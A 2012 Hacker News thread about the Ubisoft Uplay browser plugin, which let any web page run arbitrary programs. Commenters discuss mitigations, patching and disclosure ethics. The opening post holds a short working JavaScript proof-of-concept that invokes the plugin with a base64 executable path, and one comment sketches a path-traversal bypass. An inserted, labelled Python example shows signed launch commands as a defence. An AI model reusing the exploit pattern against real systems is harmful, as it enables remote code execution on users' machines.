
Ubisoft "Uplay" DRM exposed as rootkit

317 points| rightclick | 13 years ago | reply

If you play one of the games below try clicking on this link (tested with Assassin's Creed on Win7 and Firefox).

http://pastehtml.com/view/c6gxl1a79.html

  var x = document.createElement('OBJECT');
  x.setAttribute("type", "application/x-uplaypc");
  document.body.appendChild(x);
  x.open("-orbit_product_id 1 -orbit_exe_path QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play");

Ubisoft installs a backdoor that allows any website to take over your computer. The Sony BMG rootkit was also DRM and required product recall when it was discovered.

http://en.wikipedia.org/wiki/Ubisoft#Games

    Assassin's Creed II
    Assassin's Creed: Brotherhood
    Assassin's Creed: Project Legacy
    Assassin's Creed Revelations
    Assassin's Creed III
    Beowulf: The Game
    Brothers in Arms: Furious 4
    Call of Juarez: The Cartel
    Driver: San Francisco
    Heroes of Might and Magic VI
    Just Dance 3
    Prince of Persia: The Forgotten Sands
    Pure Football
    R.U.S.E.
    Shaun White Skateboarding
    Silent Hunter 5: Battle of the Atlantic
    The Settlers 7: Paths to a Kingdom
    Tom Clancy's H.A.W.X. 2
    Tom Clancy's Ghost Recon: Future Soldier
    Tom Clancy's Splinter Cell: Conviction
    Your Shape: Fitness Evolved

136 comments

[+] Foy|13 years ago|reply
Oh hell no. I can't believe this shit... and Tom Clancy's Ghost Recon: Future Soldier was such a good game too. T_T

Next time I want to play an Ubisoft game I'm just going to pirate it.

EDIT: I buy 99% of my video games through Steam, and when the games I get through Steam want to use their own launcher (play, windows live games, or EA's Origin, for example) I always get peeved... to find out it allows arbitrary remote code execution is absolutely infuriating.

EDIT: Oh, btw, I'm using Opera 12.

EDIT: Protect yourself (in Opera, at least) by going to Settings -> Preferences(menu option) -> Advanced(Tab) -> Downloads(left menu bar) -> Search for "uplay" and delete the associated row.

[+] jiggy2011|13 years ago|reply
I hate the hoop jumping in modern games. I was playing Street Fighter 4 recently and it comes up with "oh, you want to save your single player game? You have to create a MicrosoftWindowsBingGamesPhone8ForXboxLive.Net account" .

Then of course you have to wait for the damn thing to sign in every time you want to play the game "Connection failed, do you want to retry?"

[+] cheald|13 years ago|reply
I'm just not buying any more Ubisoft games. Between the abortion of the user experience that is UPlay, their crappy always-online DRM, and then this, I'm just done giving them my money, I don't care how much I like their games.

There's no shortage of good games to play, and I'm just not going to give my money to companies that abuse their customers like Ubisoft does.

Hey Ubisoft, because I hope someone there is reading this thread: When your DRM is so bad that it makes people who would otherwise buy your games want to pirate them, you have utterly, totally, and completely failed. Pass that on to your boss please.

Edit: Protect yourself in Chrome by going to about:plugins and just turning it off.

[+] iy56|13 years ago|reply
Pirating the software does not do anything here. The security hole is not related to the DRM and pirated versions come with the same UPlay installs as legitimate copies.
[+] beedogs|13 years ago|reply
"Next time I want to play an Ubisoft game I'm just going to pirate it."

Another good reason to pirate Ubisoft's games is that none of them work when Uplay is down. Uplay is down a lot more often than never.

[+] pilif|13 years ago|reply
I wouldn't say that this is a rootkit (there's no kernel-based magic or even just privilege elevation going on), nor that this was done with bad intentions.

This is just inexperienced developers («it's "encrypted" using base64 - we're fine!!») that had a "great idea" (= launch games from an embedded IE control) that has, kinda, backfired.

The sad thing is that it would be trivial (I'm using the word "trivial" here as I have implemented something like this just last Friday in 3 hours) to add a signature to that command line and only execute signed command lines - I mean, these games require an internet connection anyways, so there's nothing stopping them from serving the launcher from somewhere in the web and have a private key there to do the signing.
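
An added example of the signed-command-line design pilif describes, not code from this thread or from Ubisoft's plugin. It assumes a launcher server that emits the command line and a plugin that refuses anything it cannot verify; the secret, the product id and the base64 path are constructed placeholders. pilif describes a private key on the server, i.e. an asymmetric signature; an HMAC is used here only so the example runs offline, and because the verifier would then hold the same secret, a shipped plugin should verify an asymmetric signature instead.

```python
import hashlib
import hmac
import time
from typing import Optional

# Constructed stand-in for the server-side signing key (not from the page).
# With HMAC the plugin holds the same secret, so a real deployment would use
# a public-key signature as pilif suggests; the verification flow is identical.
SERVER_SECRET = b"example-secret-not-from-the-page"

# Placeholder launch string; the base64 exe path is deliberately not a real one.
LAUNCH = "-orbit_product_id 1 -orbit_exe_path BASE64_GAME_PATH_PLACEHOLDER -uplay_steam_mode"


def sign_command(cmdline: str, ttl_seconds: int = 60, now: Optional[int] = None) -> str:
    """Server side: bind an expiry to the command line and append a MAC over both."""
    current = int(time.time()) if now is None else now
    payload = f"{current + ttl_seconds}|{cmdline}"
    tag = hmac.new(SERVER_SECRET, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}|{tag}"


def verify_command(signed: str, now: Optional[int] = None) -> Optional[str]:
    """Plugin side: return the command line only if the MAC is valid and not expired.

    The expiry is the first field and the tag the last, so a '|' inside the
    command line itself cannot confuse the split.
    """
    try:
        exp_str, rest = signed.split("|", 1)
        cmdline, tag = rest.rsplit("|", 1)
        exp = int(exp_str)
    except ValueError:
        return None
    expected = hmac.new(SERVER_SECRET, f"{exp_str}|{cmdline}".encode(), hashlib.sha256).hexdigest()
    # Constant-time comparison: a website probing the plugin learns nothing from timing.
    if not hmac.compare_digest(expected, tag):
        return None
    current = int(time.time()) if now is None else now
    if current > exp:
        return None  # stale launch string; blocks simple replay of an old one
    return cmdline


def demo(now: int = 1_000_000) -> dict:
    """Genuine string is accepted; a tampered copy and a replay after expiry are not."""
    signed = sign_command(LAUNCH, now=now)
    tampered = signed.replace("-orbit_product_id 1", "-orbit_product_id 2")
    return {
        "genuine": verify_command(signed, now=now) == LAUNCH,
        "tampered": verify_command(tampered, now=now),
        "replayed_late": verify_command(signed, now=now + 3600),
    }


if __name__ == "__main__":
    print(demo())
```

The point of the expiry field is that a signed launch string captured once cannot be fed back to the plugin indefinitely; without it, a signature alone only proves the string was issued at some point, not that it is still meant to run.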

[+] Zolomon|13 years ago|reply
Just for your information: rootkits can exist in any of the rings[1]. However, kernel-mode rootkits are most often harder to detect and get rid of. There are several definitions of a rootkit; a common definition is "software designed to hide the existence of certain processes or programs from normal methods of detection and enable continued privileged access to a computer."[2]

[1] http://en.wikipedia.org/wiki/Ring_(computer_security)
[2] http://en.wikipedia.org/wiki/Rootkit

[+] kevingadd|13 years ago|reply
Why does Tavis Ormandy (http://seclists.org/fulldisclosure/2012/Jul/375) keep putting fully usable proof of concept exploits out for widely deployed software without giving a vendor time to prepare a patch, or in this case, even notifying them? Off the top of my head, I remember he did this for the windows help center exploit and the java web start exploit. I can't understand why you would do this. You could at least give the vendor a couple weeks, and then if you're super worried, release the details as soon as an exploit is found in the wild.

As-is, he just seems like a raging hacker who loves attention and doesn't care if thousands of unsuspecting users get their credit card details stolen by malware authors. I must be misunderstanding something, yeah?

[+] Paul_S|13 years ago|reply
Because the company wasn't acting in good faith? IMHO they put that there on purpose and they deserve to be exposed as evil bastards that they are.
[+] slackito|13 years ago|reply
Giving a browser plugin the ability to run any program on the user machine without any kind of validation or prompting is so stupid/evil that they deserve the worst PR backlash they can get.

Also, that's probably the quickest way to get them to release a fix.

[+] quadhome|13 years ago|reply
The full disclosure debate goes back a long time. I recommend doing some light Googling to understand some of the counterpoints.

http://en.wikipedia.org/wiki/Full_disclosure

As for your "raging hacker who ...," dig, consider the idea that malware authors already knew about the vulnerability and have been using it.

[+] kevingadd|13 years ago|reply
I asked a question. If you're going to downvote me for having a wrong opinion, you should at least respond and tell me the answer to my question, like 'this is proper behavior for a security researcher because X'.
[+] killyourheros|13 years ago|reply
Very few companies will pay for this type of exploit, even fewer will offer a thanks. It's easier to get them fixed this way.
[+] fmavituna|13 years ago|reply
Google Chrome users: You can go to "about:plugins" and disable this and all other things that might expose you to extra security risks such as "Microsoft Office" (even "Native Client") or any other plugins that are exposed in there by 3rd parties without any confirmation.
[+] vyrotek|13 years ago|reply
I think they just fixed this. It opened Uplay and it instantly downloaded a new update released today.

Version 2.0.4 - Monday July 30th 2012 - "Fix addressing browser plugin. Plugin now only able to open Uplay application"

[+] MichaelGG|13 years ago|reply
I would love to see how they patched it. Seems folks like these might implement a check like 'cmd.Contains("uplay.exe")' and let you do "C:\whatever\uplay.exe\..\..\bad.exe".
[+] simias|13 years ago|reply
I'm not sure if that's what the OP implied, but I'm not sure this was done on purpose. "Never attribute to malice that which is adequately explained by stupidity". Ubisoft is well known for their aggressive anti-pirating practices (cloud saves for instance), but that's just too idiotic.

Here's taviso's mail on seclists: http://seclists.org/fulldisclosure/2012/Jul/375

I hope ubisoft reacts quickly.

[+] aristidb|13 years ago|reply
If they can't do a crippling DRM properly, then maybe they have no business building one at all.
[+] Symmetry|13 years ago|reply
When trying to understand how this happened and what Ubisoft will do about it I agree that it probably was stupidity rather than malice. But when considering whether to do business with Ubisoft in the future remember Grey's Law: "Any sufficiently advanced stupidity is indistinguishable from evil".
[+] iy56|13 years ago|reply
This is a social integration feature and not part of their DRM.
[+] sargun|13 years ago|reply
This is concerning. Does anyone have any links to comments by Ubisoft? Any reason why they would need the ability to execute arbitrary code in a hidden manner? From what I understand, we call these things Trojans...
[+] cabirum|13 years ago|reply
UBI is not alone doing this.

Battlefield 3 also installs its plugin ("ESN Launch Mozilla Plugin") in all browsers on a PC. It's capable of running EA's Origin service, so does it present the same threat?

[+] drucken|13 years ago|reply
Also, game publisher Nexon silently installs a browser plugin (Nexon Game Controller) on many (all?) of its games, none of which AFAIK need a browser:

Vindictus/Mabinogi Heroes
Dragon Nest
Maplestory
Atlantica Online
Combat Arms

[+] cgbystrom|13 years ago|reply
Without need to discuss security implementations - no.
[+] atrius|13 years ago|reply
I have several of these games (SWS, PoP, Heroes MM VI) installed as well as UPlay but do not have any file associations for the type listed. Nor is "x-uplaypc" anywhere in the registry for the Windows shell.

I also have titles that use online login from Ubi such as ANNO 2070 installed.

I think the list of affected titles is far smaller than listed.

How and when is this association set? Has someone identified which application in the installer performs it? Is it a particular UPlay version?

I don't doubt they are setting this up to allow them to run games from a browser. EA does it with Origin, Valve does it with Steam, as well as numerous other applications.

I don't doubt its existence but I think people are starting a wildfire without enough facts. I can't even seem to research this because it's not on my machine.

[+] jeremysalwen|13 years ago|reply
Confirmed that this works on Win7/Firefox/Prince of Persia.
[+] mikeymeows|13 years ago|reply
Wow, well I already knew ubisoft were fisting me, but two hands? cmon.
[+] rmc|13 years ago|reply
Oh please, I know you're being light hearted, and repeating common cultural memes, but please keep the "receiving anal is submission" to yourself. It's often used as an excuse to call gay men "not real men" or effeminate. People (of all genders & sexualities) who like fisting are not evil either.
[+] Foy|13 years ago|reply
More like two feet.

AFAIK Sony never installed backdoors, and I thought they were the worst of the DRM crowd.

[+] res0nat0r|13 years ago|reply
If this was something released by Valve would it be described as a 'rootkit', or more of a dumb mistake? The internet loves Steam and anything and everything by Valve and hates Ubisoft.
[+] slurgfest|13 years ago|reply
By all means, bring out the inept rootkit installed by Steam which creates any remotely comparable vulnerability in as many PCs.
[+] ajasmin|13 years ago|reply
So does this have some legitimate use on the web (such as product activation on the Ubisoft website) or is this an ActiveX component intended to be used locally that could have been marked as "safe for scripting" by mistake?

Edit: Other comments suggest there's a NPAPI plugin as well so it's definitely intended for use on the web.

Also in what sense is this a rootkit? Is this purposely hidden from the list of IE addons or something?

[+] bbrtyth|13 years ago|reply
Because of people like this (the straw was Growl installing itself for the third time), I've had to completely change the permissions on particularly vulnerable folders in OS X. Anyone creating software, if you are not already aware of this: installing anything that is not completely and clearly explained beforehand makes you a despicable wretch.
[+] caiusdurling|13 years ago|reply
FWIW growl doesn't install itself, applications that use it are _supposed_ to offer to install growl for you, but there's been a few that don't and just force it on you.

The growl devs really really hate those applications - http://growl.info/thirdpartyinstallations.php has more info.

[+] fmavituna|13 years ago|reply
Even though the original vulnerability was quite lame and violated the first rule of writing an ActiveX plugin (site-locking and making it only available over HTTPS otherwise it's still vulnerable to code execution via MITM).

It's impressive that they already updated Uplay to address this problem (not sure whether the fix is actually working or not though).

[+] Executor32|13 years ago|reply
Doesn't work for me in either IE or Chrome, and I have AssCreed II, AssBro, AssRev, and Forgotten Sands all installed. There is also no uPlay plugin to be found in either browser. I suspect this only applies to certain versions of uPlay; whether newer or older than the version I have installed, I have no idea.
[+] Aissen|13 years ago|reply
Any mitigation? Is it possible to disable this browser plugin?
[+] obtu|13 years ago|reply
Google and Mozilla will certainly add it to their plugin blacklists. Trojan capabilities remote-controlled through a browser, that's a very serious security risk to their users.
[+] e_p|13 years ago|reply
This is a simple, obvious and extremely dangerous error, that anyone with experience or appropriate education would have avoided.

There's an evident frivolous attitude towards technical quality control present here, and everyone should avoid installing games requiring uPlay for the time being.

[+] ferongr|13 years ago|reply
How does it work on Firefox? Does Ubisoft install an NPAPI plugin for browsers without ActiveX?